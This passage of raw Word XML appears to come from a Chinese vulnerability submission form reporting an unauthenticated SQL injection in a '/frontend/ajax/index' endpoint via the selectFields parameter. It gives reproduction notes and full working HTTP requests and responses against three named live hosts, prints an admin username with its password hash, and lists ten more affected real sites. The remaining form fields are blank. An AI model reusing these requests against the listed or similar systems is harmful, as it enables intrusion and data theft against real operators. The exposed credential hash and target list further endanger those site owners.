            </w:r>
          </w:p>
          <w:p w14:paraId="67D279DE">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BA7098D">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>危害在此真实发生：攻击者从未经任何认证的请求中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>逐字取得后台管理员账号与口令哈希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admin:$2y$10$IYTN5uMdfMhTOHJkkmc22.geLEZk03pTfzBrWpD5f5AMObnaBUJ8O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E65C78A">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4）复现注意事项</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AAE74F">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">须携带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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>（否则控制器不进入 JSON 分支）；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selectFields[name]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必须含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(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才能命中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fieldRaw()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原样拼接分支；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selectFields[value]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需为真实列名（如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id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>）以保证 SELECT 可执行。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C88A93">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>黑盒案例：（受影响案例）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B42F602">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>铁律 S2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>：下列</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>每一个</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>具体案例都必须给出 ```http 报文原文（完整请求行 + 请求头 + 关键响应）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="199FABE4">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>纯文字描述步骤视为不合格</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>（例：“请求 A 接口，返回数据库名”）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B1315F">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>具体案例证明（3个）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59568CEB">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1）站点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https://199.102.216.176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—— 匿名回显真实数据库名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154_12_58_103</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4358812A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20database%28%29%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC93CA1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Host: 199.102.216.176</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36BFA362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User-Agent: Mozilla/5.0 (compatible; NCC-research/1.0; authorized security testing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2332E2B0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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5258F3E7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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6AD5AB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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8FE3C5">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02A2180C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBC6A59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Content-Type: application/json; charset=utf-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5CC960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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEC4B4F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{"code":1,"msg":"","data":[{"(select database())":"154_12_58_103","id":1},{"(select database())":"154_12_58_103","id":2}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A83AE9">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78791D2B">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2）站点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https://resource.hsesw.cn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—— 匿名回显真实数据库名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resource</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA03232">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20database%28%29%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D87760B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Host: resource.hsesw.cn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E3480C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User-Agent: Mozilla/5.0 (compatible; NCC-research/1.0; authorized security testing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CBD6153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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A7DB703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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20585297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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6D04CB">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42200786">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265D7DD1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Content-Type: application/json; charset=utf-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C88C686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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2960AA26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{"code":1,"msg":"","data":[{"(select database())":"resource","id":92},{"(select database())":"resource","id":93}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E038B0">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40B80B41">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3）站点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https://120.27.146.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> —— 匿名回显真实数据库名 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:color w:val="003399"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>findmypet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CF742C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20database%28%29%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136A5607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Host: 120.27.146.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A12E3E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User-Agent: Mozilla/5.0 (compatible; NCC-research/1.0; authorized security testing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17EFC21F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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6190978A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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30AA0B16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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6496E284">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="359C3EDC">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="607AFE99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Content-Type: application/json; charset=utf-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36686336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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD8CAE3">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:ind w:left="240"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{"code":1,"msg":"","data":[{"(select database())":"findmypet","id":1},{"(select database())":"findmypet","id":2}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A69BA4B">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2282E995">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>其他受影响目标</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0070CC7E">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1. https://140.246.206.80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B87C8D7">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2. https://122.51.211.94</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D95A7EA">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3. https://139.129.26.72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7A64F6">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4. https://60.247.156.53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2702B7">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>5. https://47.94.196.204</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C582F7">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>6. http://207.57.135.79</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F02AB87">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>7. https://lwt.jiukeai.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B3EE1A">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>8. https://47.113.197.186</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C1F804">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9. https://clue.hnhljy.cn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6307E29E">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10. https://wjcdz.cn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218D019F"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2921270A">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="509889D1">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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临时解决方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18DE5011">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both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14:paraId="413D75F0">
        <w:trPr>
          <w:trHeight w:val="820" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44EDFA79">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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正式解决方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7743DF1E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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 w14:paraId="6EE648A5">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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483B72AD">
            <w:pPr>
              <w:widowControl/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SQL注入类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="713F2B11">
        <w:trPr>
          <w:trHeight w:val="610" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FE82E27">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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SQL注入类型及sqlmap命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0950B1F8">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>1.类型：get、post</w:t>
            </w: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1"/>
                <w:szCs w:val="21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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>2.sqlmap命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31B14C3D">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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12E257A">
            <w:pPr>
              <w:widowControl/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XSS类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DF3D7D6">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E5EEFC5">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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触发xss的payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C79795E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>　</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="09176F3E">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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64B12CE">
            <w:pPr>
              <w:widowControl/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命令执行类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63C6B8CB">
        <w:trPr>
          <w:trHeight w:val="1090" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16AD16DD">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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类型、中间件/框架、利用工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FBCAFCB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>1.类型：防火墙、路由器、交换机、其他</w:t>
            </w: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1"/>
                <w:szCs w:val="21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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>2.中间件/框架：jboss、weblogic、webspere、jenkins、apache struts、其他</w:t>
            </w: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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>3.利用工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F396A6F">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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3B1E7B6F">
            <w:pPr>
              <w:widowControl/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拒绝服务/工控设备类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F76E8E8">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F99B1D9">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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POC及触发过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="014B648E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>　</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="470007FD">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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FB46F6F">
            <w:pPr>
              <w:widowControl/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二进制类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5E4FD6A6">
        <w:trPr>
          <w:trHeight w:val="610" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08C2790A">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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版本号、触发位置及POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0135A796">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>　</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BD89A7A">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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4EF30C72">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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其他类型（补充填写）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C3D7CA2">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F856A3">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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脚本反序列化poc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5261159B">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
